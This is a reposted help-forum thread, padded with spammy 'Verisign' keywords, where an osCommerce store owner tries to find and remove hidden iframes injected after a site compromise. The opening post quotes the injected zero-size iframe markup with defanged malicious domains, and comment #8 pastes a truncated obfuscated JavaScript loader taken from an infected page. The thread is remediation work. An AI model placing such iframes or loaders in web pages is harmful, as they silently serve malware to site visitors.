Problem when using Verisign SSL Certificates?

Get a Verisign SSL certificate for 30 days FREE. Click here to use coupon...

Get a free trial of Verisign SSL certificates. Click here for this special deal...
Got a question... Problem when using Verisign SSL Certificates? Thanks in advance for any response. Second question.. My client was recently informed by AUScert that her Verisign website was Verisign hosting malicious content.....specifically iframes that pointed to links as follows (Here and below, I have masked and incorrectly formated them so these are NOT the exact links):.

>> hxxp://msn-analytics. net/count.php?o=2.

>> hxxp://pinoc. org/count.php?o=2.

>> hxxp://wsxhost. net/count.php?o=2.

Were being inserted into the html coding for many pages..

I believe we fixed the problem that allowed it to get in there in first place and with hours of work, removed all instances of the code and finally removed a couple of php scripts that had been installed on the server which we believe were allowing the unwanted access..

The only problem is that the iframe code is STILL present in source code for the catalog Verisign site (oscommerce). I downloaded EVERY single file associated with the catalog Verisign site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the oscommerce files BUT it is still showing up in source code..

Has anyone else experienced this and if so, how or where or in what file or where in the mySQL data base did you need to go to remove the code such that it was no longer present in the source code for the oscommerce site. For that matter the code is inserted in very first line of the source i.e:.

<iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://wsxhost. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>.

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">.

<html dir="LTR" lang="en">.


<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">.............


- Fengshui37..

Comments (15)

I'm stumped. I'm not so sure what is the answer. I'll do some poking around and get back to you if I bump into an decent answer. You should email the people at Verisign as they probably could answer your Verisign question..

Comment #1

You probably won't find it searching for the actual text injected into the page..

They normally use obfuscated PHP code to do that..

Many hijackers use the PHP function base64_decode for that..

Search for the string.


In the catalog files..

If you want you can post any suspicious looking results..

It's usually not too difficult to spot "malicious" code...

Comment #2

I downloaded it all including the htaccess files and image folders etc onto my hard drive.....and essentially searched for "pinoc" which is definitely a string that is present.

In the source code for the "store" (first line before the <html> tag). Since the "webpage" is all script driven in oscommerce, I am actually seeing it when.

Selecting the "view source code" option from either right click or browser drop down menu. I've been trying to find where it has been placed in one of the scripts.

That displays the store. I found every instance elsewhere on the server outside of the catalog folder (446 of them) and removed them and also fixed what I think.

Was the original loophole that allowed the doggone thing to be "installed". So far that is holding but still can't find out where they installed it in the catalog or how they did it..

Also searched for string "base64". None found...

Comment #3

Whats you URL there I will see the source.


Comment #4

I did the search for the string base64 and also threw in "iframe" and still no instances found. Its coming from somewhere because when I load the page and view source it's there but it's apparently NOT in any of the catalog files. Unless they've hidden it somehow in one of those core.#### files (I have no idea what their function is)..

Any other ideas?.

- Fengshui37.


...never bugs, my programs do however have occasional undisclosed random features.....

Comment #5


I have similar problem, when I open my OS commerce page I get the VIRUS alert.



I have been looking in the catalog files but I did not find anything..

This is my link.



Thanks in advance!.


Comment #6

I cannot look as my virus checker will not allow me to, check you images folder for anything you do not recgonisealso chack you folder permissions no higher than 755.


Comment #7

Source code contains:.

<script>function c1200847515n490fdfacb8138(n490fdfacb8927){ return (parseInt(n490fdfacb8927,16));}.

Function n490fdfacba0f4(n490fdfacba8f0){ function n490fdfacbb4ce(){var n490fdfacbb8c0=2;return n490fdfacbb8c0;}.

Var n490fdfacbace0='';n490fdfacbbcbd=String.fromCharCode;for(n490fdfacbb0dc=0;n490fdfacbb0dc<n490fdfacba8f0.length;.

N490fdfacbb0dc+=n490fdfacbb4ce()){ n490fdfacbace0+=(n490fdfacbbcbd(c1200847515n490fdfacb8138(n490fdfacba8f0..

Substr(n490fdfacbb0dc,n490fdfacbb4ce()))));}return n490fdfacbace0;} var xfa='';var n490fdfacbc0ba='3C7'+xfa+'3637'+.



























Comment #8

URL for the Verisign site I'm talking about is

- Fengshui37.


...never bugs, my programs do however have occasional undisclosed random features.....

Comment #9

It gets inserted into the page source before this:.

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">.

So what's in your.



Before that code?..

Comment #10

Hi, I just tried to go to the mentioned Verisign site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my Verisign website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things...

Comment #11

Here is the code up to and slightly after that:.



$Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $.

OsCommerce, Open Source E-Commerce Solutions.


Copyright © 2003 osCommerce.

Released under the GNU General Public License.



// the following cPath references come from application_top.php.

$category_depth = 'top';.

If (isset($cPath) && tep_not_null($cPath)) {.

$categories_products_query = tep_db_query("select count(*) as total from "TABLE_PRODUCTS_TO_CATEGORIES" where categories_id = '"(int)$current_category_id"'");.

$cateqories_products = tep_db_fetch_array($categories_products_query);.

If ($cateqories_products['total'] > 0) {.

$category_depth = 'products'; // display products.

} else {.

$category_parent_query = tep_db_query("select count(*) as total from "TABLE_CATEGORIES" where parent_id = '"(int)$current_category_id"'");.

$category_parent = tep_db_fetch_array($category_parent_query);.

If ($category_parent['total'] > 0) {.

$category_depth = 'nested'; // navigate through the categories.

} else {.

$category_depth = 'products'; // category has no products, but display the 'no products' message.






<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">.

<html <?php echo HTML_PARAMS; ?>>.


If this is different from what people with "clean" sites have, let me know what is different because I am not seeing the offending code inserted here in this file..

- Fengshui37.

...never bugs, my programs do however have occasional undisclosed random features.....

Comment #12

I'm betting that if your avast detected it, it also blocked it from causing any problems. I've got this thing 99 percent removed from the server for actually 3 different web sites....the only part I haven't figured out yet is the catalog i.e. where is it residing/hiding????.

...never bugs, my programs do however have occasional undisclosed random features.....

Comment #13

Another thought.....

Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all...

Comment #14

Nothing jumps out at me here far as I can tell it's OK...but I've got a version from July I can run a comparison on I suppose. Too many files to do this on one by one with the (actually superior) text editor I'm using.....

...never bugs, my programs do however have occasional undisclosed random features.....

Comment #15

Huh? The store isn't being run in an iframe. The catalog is set up as it's own web page and separate from the other 3 sites that also have files in same server/public_html (root) folder. The catalog i.e. store is running oscommerce software as written and distributed and not using anything else from elsewhere on the server...

Comment #16

This question was taken from a support group/message board and re-posted here so others can learn from it.


Categories: Home | Diet & Weight Management | Vitamins & Supplements | Herbs & Cleansing |

Sexual Health | Medifast Support | Nutrisystem Support | Medifast Questions |

Web Hosting | Web Hosts | Website Hosting | Hosting |

Web Hosting | GoDaddy | Digital Cameras | Best WebHosts |

Web Hosting FAQ | Web Hosts FAQ | Hosting FAQ | Hosting Group |

Hosting Questions | Camera Tips | Best Cameras To Buy | Best Cameras This Year |

Camera Q-A | Digital Cameras Q-A | Camera Forum | Nov 2010 - Cameras |

Oct 2010 - Cameras | Oct 2010 - DSLRs | Oct 2010 - Camera Tips | Sep 2010 - Cameras |

Sep 2010 - DSLRS | Sep 2010 - Camera Tips | Aug 2010 - Cameras | Aug 2010 - DSLR Tips |

Aug 2010 - Camera Tips | July 2010 - Cameras | July 2010 - Nikon Cameras | July 2010 - Canon Cameras |

July 2010 - Pentax Cameras | Medifast Recipes | Medifast Recipes Tips | Medifast Recipes Strategies |

Medifast Recipes Experiences | Medifast Recipes Group | Medifast Recipes Forum | Medifast Support Strategies |

Medifast Support Experiences |


(C) Copyright 2010 All rights reserved.